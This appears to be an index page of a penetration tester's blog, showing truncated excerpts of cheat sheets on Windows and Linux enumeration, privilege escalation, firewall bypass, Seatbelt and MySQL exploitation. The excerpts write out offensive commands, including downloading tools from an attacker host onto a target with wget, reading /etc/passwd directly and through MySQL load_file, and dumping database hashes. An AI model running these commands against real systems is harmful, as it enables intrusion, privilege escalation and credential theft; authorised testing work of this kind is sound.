akde/infosec

Click Here

  • Extended Windows System Enumeration

    Various Show who else is logged in. qwinsta Open the Event View­er and search in the looks. Have fun! Network enumeration Show the net­work con­fig­u­ra­tion. Are there mul­ti­ple interfaces? ipconfig /all Rout­ing information route print Show cur­rent net­work con­nec­tions. After check­ing this com­mand: CHECK all ports with the pre­vi­ous found ones! netstat -ano Check the ARP cache…

  • Linux privilege escalation scripts

    Pre­pare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Pre­pare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, exe­cute it: Lin­Peas: ./linpeas.sh LinEnum: ./LinEnum.sh lin­ux-smart-enu­mer­a­tion: ./lse.sh ‑l1 lin­ux-exploit-sug­gester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh lin­ux­privcheck­er: ./linuxprivchecker.py Final­ly: Copy type­script file to the PentestManager!

  • Bypassing Windows protection mechanisms

    Execution If you can­not exe­cute an exe file, try these options: Windows firewall / netsh Check fire­wall state netsh advfirewall show currentprofile netsh advfirewall show state If the fire­wall is active, list the configuration: netsh advfirewall show config Exam­ple how to add excep­tions into the fire­wall via the com­mand line from an administrator: C:\Windows\temp> netsh advfirewall firewall…

  • Windows privilege escalation

    After these steps, more things to do: Work with processes For enu­mer­a­tion of process­es, see the Basic Win­dows sys­tem enu­mer­a­tion post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Sus­pend and con­tin­ue a run­ning process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLL’s Show all…

  • Seatbelt

    Auto­mates Win­dows enu­mer­a­tion. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe with­out argu­ments to see pos­si­ble para­me­ters. Example Seatbelt.exe OSInfo Processes Remote From anoth­er Win­dows sys­tem, seat­belt can con­nect to a vic­tim and per­form com­mands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which per­form mul­ti­ple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…

  • Privilege Escalation Linux ALT

    1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…

  • MySQL My Structured Query Language

    Con­nect: mysql --host=10.10.10.13 -P4444 -u admin admin Var­i­ous commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the cur­rent process id: SELECT load_file('/etc/passwd'); Write as the dae­mon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…